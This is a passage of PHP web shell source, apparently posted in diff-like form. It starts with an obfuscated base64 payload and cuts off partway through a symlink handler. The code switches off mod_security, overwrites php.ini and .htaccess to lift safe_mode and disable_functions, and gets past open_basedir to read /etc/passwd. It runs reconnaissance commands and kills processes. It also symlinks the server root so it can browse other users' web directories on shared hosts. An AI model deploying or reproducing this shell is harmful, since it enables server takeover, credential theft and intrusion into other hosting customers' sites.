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'))); ?></textarea>
- </td>
- </tr>
- <tr>
- <td>
- <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" />
- </td></tr></table>
- </form>
- <?php }
- # x=dmsec1
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dmsec1')) {
- @error_reporting(0);
- $htaccess=fopen('.htaccess','w');
- $iniphp=fopen('ini.php','w');
- $jablay="<IfModule mod_security.c>
- SecFilterEngine OFF
- SecFilterScanPOST OFF
- </IfModule>";
- $kimcil="<?
- echo ini_get(\"safe_mode\");
- echo ini_get(\"open_basedir\");
- include(\$_GET[\"file\"]);
- ini_restore(\"safe_mode\");
- ini_restore(\"open_basedir\");
- echo ini_get(\"safe_mode\");
- echo ini_get(\"open_basedir\");
- include(\$_GET[\"ss\"]);
- ?>";
- fwrite($htaccess,$jablay);
- fwrite($iniphp,$kimcil);
- $kobel="<center><br/><br/><nobr><b><span class='b7'>O=:[ BYPASS</span> <span class='b8'>HTACCESS ]:=O</span></b></nobr><br/><br/><nobr><span class='b9'>Generate htaccess & ini.php Successfully :)</span></nobr><br/><br/><br/></center>";
- echo $kobel;
- }
- # x=dmsec2
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dmsec2')){ ?>
- <form action="?dm=<?php echo $pwd; ?>&x=dmsec2" method="post">
- <?php
- @error_reporting(0);
- $ayo=fopen('php.ini','w');
- $blay=" safe_mode = OFF
- disable_functions = NONE";
- fwrite($ayo,$blay);
- $hotel=" <center><br/><br/><nobr><b><span class='b7'>O=:[ BYPASS</span> <span class='b8'>PHP.INI ]:=O</span></b></nobr><br/><br/>
- <nobr><span class='b9'>Generate php.ini Successfully :)</span></nobr><br/><br/><br/></center>";
- echo $hotel;
- }
- # x=dmsec3
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dmsec3')) {
- @error_reporting(0);
- function CleanDir($d){
- $d=str_replace("\\","/",$d);
- $d=str_replace("//","/",$d);
- return $d;
- }
- if(isset($_POST['curl_bypass'])){
- @error_reporting(0);
- $ch=curl_init("file://$_POST[file_bypass]");
- curl_setopt($ch,CURLOPT_HEADERS,0);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- $file_out=curl_exec($ch);
- curl_close($ch);
- echo "<br/><br/><center><textarea rows='20' style='color:#FF0000;background-color:#000000' cols='70' >".htmlspecialchars($file_out)."</textarea></br></br>";
- }
- elseif(isset($_POST['tmp_bypass'])) {
- tempnam("/home/",$_POST['file_passwd']);
- }
- elseif(isset($_POST['copy_bypass'])) {
- if(@copy($_POST['file_bypass'],$_POST['dest'])) {
- @$fh=fopen($_POST['dest'],'r');
- echo "<textarea rows='20' style='color:#FF0000;background-color:#000000' cols='70'>".htmlspecialchars(@fread($fh,filesize($_POST['dest'])))."</textarea></br></br>";
- @fclose($fh);
- } else echo "<center><br/><br/>
- <h1>O=:[ BYPASS DENIED ]:=O</h1><br></br>";
- }
- echo "<br/><br/><table style='margin: auto; width: 100%; text-align: center;'><tr>
- <td colspan='3'> <center><br/><br/><nobr><b><span class='b7'>O=:[ BYPASS</span><span class='b8'>BASEDIR ]:=O</span></b></nobr><br/><br/></center> </td>
- </tr>
- <tr>
- <td>[~] Bypass Basedir cURL [~]</td>
- <td>[~] Bypass Basedir tempnam() [~]</td>
- <td>[~] Bypass Basedir copy() [~]</td>
- </tr>
- <tr>
- <td><nobr><form method='post' name='bypasser'>
- FILE : <input type='text' style='color:#FF0000;background-color:#000000' value='/etc/passwd' name='file_bypass'> <input type='submit' name='curl_bypass' style='color:#FF0000;background-color:#000000' value='Bypass'></form></td>
- <td><nobr><form method='post' name='bypasser'>FILE : <input type='text' style='color:#FF0000;background-color:#000000' value='../../../etc/passwd' name='file_bypass'> <input type='submit' style='color:#FF0000;background-color:#000000' name='tmp_bypass' value='Bypass'>
- </nobr></form>
- </td>
- <td><nobr><form method='post' name='bypasser'>FILE COPY TO : <input type='text'style='color:#FF0000;background-color:#000000' style='width: 250px;' name='dest' value='".CleanDir(getcwd())."/maho.txt'> <input type='text' style='color:#FF0000;background-color:#000000' value='/etc/passwd' name='file_bypass'> <input type='submit' name='copy_bypass' style='color:#FF0000;background-color:#000000' value='Bypass'>
- </nobr></form>
- </td>
- </table>";
- }
- # x=dmsec4
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dmsec4')) {
- function dmprocess() {
- if(!$win) {
- $handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");
- }
- else {
- $handler = "tasklist";
- }
- $ret = myshellexec($handler);
- if (!$ret) {
- echo "Can't execute \"".$handler."\"!";
- }
- else {
- if (empty($processes_sort)) {
- $processes_sort = $sort_default;
- }
- $parsesort = parsesort($processes_sort);
- if(!is_numeric($parsesort[0])) {
- $parsesort[0] = 0;
- }
- $k = $parsesort[0];
- $ret = htmlspecialchars($ret);
- if(!$win) {
- if($pid) {
- if (is_null($sig)) {$sig = 9;}
- echo "Sending signal ".$sig." to #".$pid."... ";
- if (posix_kill($pid,$sig)) {
- echo "OK.";
- }
- else {
- echo "ERROR.";
- }
- }
- while (ereg(" ",$ret)) {
- $ret = str_replace(" "," ",$ret);
- }
- $stack = explode("\n",$ret);
- $head = explode(" ",$stack[0]);
- unset($stack[0]);
- $prcs = array();
- foreach ($stack as $line) {
- if(!empty($line)) {
- echo "<tr>";
- $line = explode(" ",$line);
- $line[10] = join(" ",array_slice($line,10));
- $line = array_slice($line,0,11);
- $prcs[] = $line;
- echo "</tr>";
- }
- }
- }
- else {
- while (ereg(" ",$ret)) {
- $ret = str_replace(" ","",$ret);
- }
- while (ereg(" ",$ret)) {
- $ret = str_replace(" ","",$ret);
- }
- while (ereg(" ",$ret)) {
- $ret = str_replace(" ","",$ret);
- }
- while (ereg(" ",$ret)) {
- $ret = str_replace(" ","",$ret);
- }
- while (ereg(" ",$ret)) {
- $ret = str_replace(" ","",$ret);
- }
- while (ereg(" ",$ret)) {
- $ret = str_replace(" ","",$ret);
- }
- while (ereg(" ",$ret)) {
- $ret = str_replace(" ","",$ret);
- }
- while (ereg(" ",$ret)) {
- $ret = str_replace(" ","",$ret);
- }
- while (ereg(" ",$ret)) {
- $ret = str_replace(" ","",$ret);
- }
- while (ereg("",$ret)) {
- $ret = str_replace("","",$ret);
- }
- while (ereg(" ",$ret)) {
- $ret = str_replace(" ","",$ret);
- }
- $ret = convert_cyr_string($ret,"d","w");
- $stack = explode("\n",$ret);
- unset($stack[0],$stack[2]);
- $stack = array_values($stack);
- $head = explode("",$stack[0]);
- $head[1] = explode(" ",$head[1]);
- $head[1] = $head[1][0];
- $stack = array_slice($stack,1);
- unset($head[2]);
- $head = array_values($head);
- if ($k > count($head)) {
- $k = count($head)-1;
- }
- $prcs = array();
- foreach ($stack as $line) {
- if (!empty($line)) {
- echo "<tr>";
- $line = explode("",$line);
- $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
- $line[2] = intval(str_replace(" ","",$line[2]))*1024;
- $prcs[] = $line;
- echo "</tr>";
- }
- }
- }
- $head[$k] = "<b>".$head[$k]."</b>".$y;
- $v = $processes_sort[0];
- if($processes_sort[1] == "d") {
- $prcs = array_reverse($prcs);
- }
- $tab = array();
- $tab[] = $head;
- $tab = array_merge($tab,$prcs);
- echo "<TABLE height=1 cellSpacing=0 cellPadding=5 width=\"100%\" border=1>";
- foreach($tab as $i=>$k) {
- echo "<tr>";
- foreach($k as $j=>$v) {
- if($win and $i > 0 and $j == 2) {
- $v = view_size($v);
- }
- echo "<td>".$v."</td>";
- }
- echo "</tr>";
- }
- echo "</table>";
- }
- }
- echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ BYPASS</span> <span class='b8'>PROCESS ]:=O</span></b></nobr><br/><br/>";
- if($win) {
- echo "<form method='post'>
- <select class='inputz' name='windowsprocess'>
- <option name='systeminfo'>System Info</option>
- <option name='active'>Active Connections</option>
- <option name='runningserv'>Running Services</option>
- <option name='useracc'>User Accounts</option>
- <option name='showcom'>Show Computers</option>
- <option name='arptab'>ARP Table</option>
- <option name='ipconf'>IP Configuration</option></select>
- <input type='submit' class='inputzbut' name='submitwinprocess' value='View'>
- </form>";
- } else {
- echo "<form method='post'>
- <select class='inputz' name='nonwindowsprocess'>
- <option name='passwd'>Passwd</option>
- <option name='syslog'>Syslog</option>
- <option name='resolv'>Resolv</option>
- <option name='hosts'>Hosts</option>
- <option name='cpuinfo'>Cpuinfo</option>
- <option name='version'>Version</option>
- <option name='sbin'>Sbin</option>
- <option name='interrupts'>Interrupts</option>
- <option name='lsattr'>lsattr</option>
- <option name='uptime'>Uptime</option>
- <option name='fstab'>Fstab</option>
- <option name='hddspace'>HDD Space</option>
- </select>
- <input type='submit' class='inputzbut' name='submitnonwinprocess' value=' >> '></form>";
- }
- $windowsprocess = $_POST['windowsprocess'];
- $nonwindowsprocess = $_POST['nonwindowsprocess'];
- if ($windowsprocess=="System Info") $winruncom = "systeminfo";
- if ($windowsprocess=="Active Connections") $winruncom = "netstat -an";
- if ($windowsprocess=="Running Services") $winruncom = "net start";
- if ($windowsprocess=="User Accounts") $winruncom = "net user";
- if ($windowsprocess=="Show Computers") $winruncom = "net view";
- if ($windowsprocess=="ARP Table") $winruncom = "arp -a";
- if ($windowsprocess=="IP Configuration") $winruncom = "ipconfig /all";
- if ($nonwindowsprocess=="Syslog") $winruncom = "cat /etc/syslog.conf";
- if ($nonwindowsprocess=="Resolv") $winruncom = "cat /etc/resolv.conf";
- if ($nonwindowsprocess=="Hosts") $winruncom = "cat /etc/hosts";
- if ($nonwindowsprocess=="Passwd") $winruncom = "cat /etc/passwd";
- if ($nonwindowsprocess=="Cpuinfo") $winruncom = "cat /proc/cpuinfo";
- if ($nonwindowsprocess=="Version") $winruncom = "cat /proc/version";
- if ($nonwindowsprocess=="Sbin") $winruncom = "ls -al /usr/sbin";
- if ($nonwindowsprocess=="Interrupts") $winruncom = "cat /proc/interrupts";
- if ($nonwindowsprocess=="lsattr") $winruncom = "lsattr -va";
- if ($nonwindowsprocess=="Uptime") $winruncom = "uptime";
- if ($nonwindowsprocess=="Fstab") $winruncom = "cat /etc/fstab";
- if ($nonwindowsprocess=="HDD Space") $winruncom = "df -h";
- if (isset($winruncom)) {
- echo "<table class='cmdbox'><tbody><tr><td colspan='2'><textarea class='output' name='content'>".exe($winruncom)."</textarea></td></tr></table></center>";
- }
- if (isset($systeminfo)) {
- echo "<br><br>";
- dmprocess();
- }
- }
- # x=dmsym1
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dmsym1')) {
- @session_start();
- @set_time_limit(0);
- @ini_set('max_execution_time',0);
- if($win){
- echo "<center><br/><br/><nobr><span class='b9'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
- }
- @mkdir('dm1sym',0777);
- $sempak = "Options all \n
- DirectoryIndex dm.html \n
- AddType text/plain .php \n
- AddHandler server-parsed .php \n
- AddType text/plain .html \n
- AddHandler txt .html \n
- Require None \n
- Satisfy Any";
- $masuk =@fopen ('dm1sym/.htaccess','w');
- fwrite($masuk ,$sempak);
- @symlink('/','dm1sym/dm.txt');
- $pg = basename(__FILE__);
- if(is_readable("/var/named")){
- echo '<center><br/><br/><nobr><b><span class="b7">O=:[ SYMLINK</span> <span class="b8">VAR/NAMED ]:=O</span></b></nobr><br/><br/></center>
- <table align="center" border="3" width="400" cellspacing="0" cellpadding="0">
- <td align="center"> <font color="white"> <b>_DOMAINS_</b></td>
- <td align="center"> <font color="white"> <b>_USERS_</b></td>
- <td align="center"> <font color="white"> <b>_SYMLINK_</b></center></td>';
- $list = scandir("/var/named");
- foreach($list as $domain){
- if(strpos($domain,".db")){
- @error_reporting(0);
- @ini_set('log_errors',0);
- @ini_set('error_log',NULL);
- $i += 1;
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
- echo "<tr>
- <td><a class='dm' href='http://".$domain." '>".$domain."</a></td>
- <td align='center'><font color='white'>".$owner['name']."</td>
- <td align='center'><a href='dm1sym/dm.txt".$owner['dir']."/public_html/' target='_blank'>Symlink</a></td>";
- }
- }
- flush();
- flush();
- }
- echo "</tr></table></div></html>";
- }
- # x=dmsym2
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dmsym2')) {
- @session_start();
- @set_time_limit(0);
- @error_reporting(0);
- @ini_set('log_errors',0);
- @ini_set('error_log',NULL);
- @ini_set('max_execution_time',0);
- if($win){
- echo "<center><br/><br/><nobr><span class='b9'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
- }
- @mkdir('dm2sym',0777);
- $sempak = "Options all \n
- DirectoryIndex dm.html \n
- AddType text/plain .php \n
- AddHandler server-parsed .php \n
- AddType text/plain .html \n
- AddHandler txt .html \n
- Require None \n
- Satisfy Any";
- $masuk =@fopen ('dm2sym/.htaccess','w');
- fwrite($masuk ,$sempak);
- @symlink('/','dm2sym/dm.txt');
- $pg = basename(__FILE__);
- if(is_readable("/etc/passwd-")){
- $gelartiker = 'file_get_contents';
- $seret = '/etc/passwd-';
- $isikarung = $gelartiker($seret);
- $buka = fopen('maho.txt', 'w');
- fwrite($buka,$isikarung);
- }
- if(isset($_GET['file']) or @filesize('maho.txt') > 0) {
- $cont = stripcslashes($_POST['file']);
- if(!file_exists('maho.txt')){
- $f = @fopen('maho.txt','w');
- $w = @fwrite($f,$cont);
- fclose($f);
- }
- if($w or @filesize('maho.txt') > 0){
- echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ SYMLINK</span> <span class='b8'>ETC/PASSWD- ]:=O</span></b></nobr><br/><br/><table align='center' border='3' width='400' cellspacing='0' cellpadding='0'>
- <td align='center'> <font color='white'> <b>_USERS_</b></td>
- <td align='center'> <font color='white'> <b>_SYMLINK_</b></td>";
- flush();
- $fil3 = file('maho.txt');
- foreach ($fil3 as $f){
- $u=explode(':', $f);
- $user = $u['0'];
- echo "<tr>
- <td align='center'><font color='white'>$user</td>
- <td align='center'><a class='dm' href='dm2sym/dm.txt/home/$user/public_html' target='_blank'>Symlink</a></td></tr>";
- flush();
- flush();
- }
- echo "</tr></table></div></html>";
- }
- }
- }
- # x=dmsym3
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dmsym3')) {
- @session_start();
- @set_time_limit(0);
- @error_reporting(0);
- @ini_set('log_errors',0);
- @ini_set('error_log',NULL);
- @ini_set('max_execution_time',0);
- if($win){
- echo "<center><br/><br/><nobr><span class='b9'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
- }
- @mkdir('dm3sym',0777);
- $sempak = "Options all \n
- DirectoryIndex dm.html \n
- AddType text/plain .php \n
- AddHandler server-parsed .php \n
- AddType text/plain .html \n
- AddHandler txt .html \n
- Require None \n
- Satisfy Any";
- $masuk =@fopen ('dm3sym/.htaccess','w');
- fwrite($masuk ,$sempak);
- @symlink('/','dm3sym/dm.txt');
- $pg = basename(__FILE__);
- $etc = file_get_contents("/etc/passwd");
- $etcz = explode("\n",$etc);
- if(is_readable("/etc/passwd")){
- echo '<center><br/><br/><nobr><b><span class="b7">O=:[ SYMLINK</span> <span class="b8">ETC/PASSWD ]:=O</span></b></nobr><br/><br/> <table align="center" border="3" width="400" cellspacing="0" cellpadding="4">';
- echo'<tr>
- <td align="center"> <font color="white"> <b>_DOMAINS_</b></td>
- <td align="center"> <font color="white"> <b>_USERS_</b></td>
- <td align="center"> <font color="white"> <b>_SYMLINK_</b></td>';
- $list = scandir("/var/named");
- foreach($etcz as $etz){
- $etcc = explode(":",$etz);
- foreach($list as $domain) {
- if(strpos($domain,".db")) {
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
- if($owner['name'] == $etcc[0]){
- $i += 1;
- echo "<tr>
- <td><a class='dm' href='http://".$domain." '>".$domain."</a></td>
- <td align='center'><font color='white'>".$owner['name']."</font></td>
- <td align='center'><a href='dm3sym/dm.txt".$owner['dir']."/public_html/' target='_blank'>Symlink</a></td>";
- } } } }
- flush();
- flush();
- }
- echo "</tr></table></div></html>";
- }
- # x=dmsym4
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dmsym4')) {
- @session_start();
- @set_time_limit(0);
- @error_reporting(0);
- @ini_set('log_errors',0);
- @ini_set('error_log',NULL);
- @ini_set('max_execution_time',0);
- if($win){
- echo "<center><br/><br/><nobr><span class='b9'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
- }
- @mkdir('dm4sym',0777);
- $sempak = "Options all \n
- DirectoryIndex dm.html \n
- AddType text/plain .php \n
- AddHandler server-parsed .php \n
- AddType text/plain .html \n
- AddHandler txt .html \n
